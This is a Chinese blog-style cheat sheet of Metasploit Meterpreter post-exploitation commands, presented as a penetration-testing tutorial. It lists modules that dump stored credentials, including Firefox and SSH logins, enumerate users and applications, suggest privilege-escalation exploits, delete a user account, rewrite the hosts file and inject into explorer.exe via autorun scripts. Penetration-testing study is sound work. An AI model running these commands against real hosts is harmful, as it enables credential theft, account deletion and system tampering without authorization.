Msf后渗透测试阶段_POST模块

该文描述了一系列使用Meterpreter工具进行的网络侦查任务,包括ARP扫描以确定网络设备,检查目标是否运行在虚拟机上,收集用户凭证,列举安装的应用程序,查看当前登录用户,获取SNMP设置,搜索本地提权漏洞,以及删除用户账户。此外,还涉及到了读取目标主机的Firefox和SSH凭据,以及如何自动执行脚本,如修改hosts文件,进程注入和获取最近打开的文件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

POST模块

run post/windows/gather/arp_scanner RHOSTS=192.168.0.0/24
  #ARP扫描

在这里插入图片描述

run post/windows/gather/checkvm  #查询目标是不是虚拟机

在这里插入图片描述

run post/windows/gather/credentials/credential_collector 
  #查看用户信息
run post/windows/gather/enum_applications
  #查看安装了哪些应用程序

在这里插入图片描述

run post/windows/gather/enum_logged_on_users
  #查看目前正在登陆的用户

在这里插入图片描述

run post/windows/gather/enum_snmp
  #查看目标机器的snmp配置

在这里插入图片描述

run post/multi/recon/local_exploit_suggester 
#查看本地提权漏洞

在这里插入图片描述

run post/windows/manage/delete_user USERNAME=sbz
  #删除用户账号

在这里插入图片描述

run post/multi/gather/env
  #查看目标机器环境变量

在这里插入图片描述

run post/multi/gather/firefox_creds
  #查看目标本机的firefox流量的账号密码
run post/multi/gather/ssh_creds
  #查看本机SSH的账号密码

自动执行meterpreter脚本

set AutoRunScript hostsedit -e 1.1.1.1,www.baidu.com  #修改host文件
set InitialAutoRunScript checkvm

自动执行post模块

set initialautorunscript migrate -n explorer.exe #注入进程
set autorunscript post/windows/gather/dumplinks  #查询最近文件
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值